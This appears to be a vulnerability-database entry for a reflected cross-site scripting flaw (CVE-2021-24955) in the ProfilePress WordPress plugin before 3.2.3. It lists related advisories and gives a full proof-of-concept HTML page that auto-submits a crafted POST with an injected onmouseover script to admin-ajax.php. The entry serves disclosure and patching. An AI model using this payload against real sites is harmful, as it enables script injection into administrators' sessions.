ProfilePress < 3.2.3 - Reflected Cross-Site Scripting on form submissio
Reporter | Title | Published | Views | Family All 5 |
---|---|---|---|---|
WPVulnDB | ProfilePress < 3.2.3 - Reflected Cross-Site Scripting | 15 Nov 202100:00 | – | wpvulndb |
CVE | CVE-2021-24955 | 13 Dec 202111:15 | – | cve |
Prion | Cross site scripting | 13 Dec 202111:15 | – | prion |
Cvelist | CVE-2021-24955 ProfilePress < 3.2.3 - Reflected Cross-Site Scripting | 13 Dec 202110:41 | – | cvelist |
NVD | CVE-2021-24955 | 13 Dec 202111:15 | – | nvd |
Source | Link |
---|---|
plugins | www.plugins.trac.wordpress.org/changeset/2626573/ |
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="pp_get_forms_by_builder_type" />
<input type="hidden" name="data" value='" onmouseover=alert(/XSS/) style=display:block;height:1000px;width:1000px; t="' />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo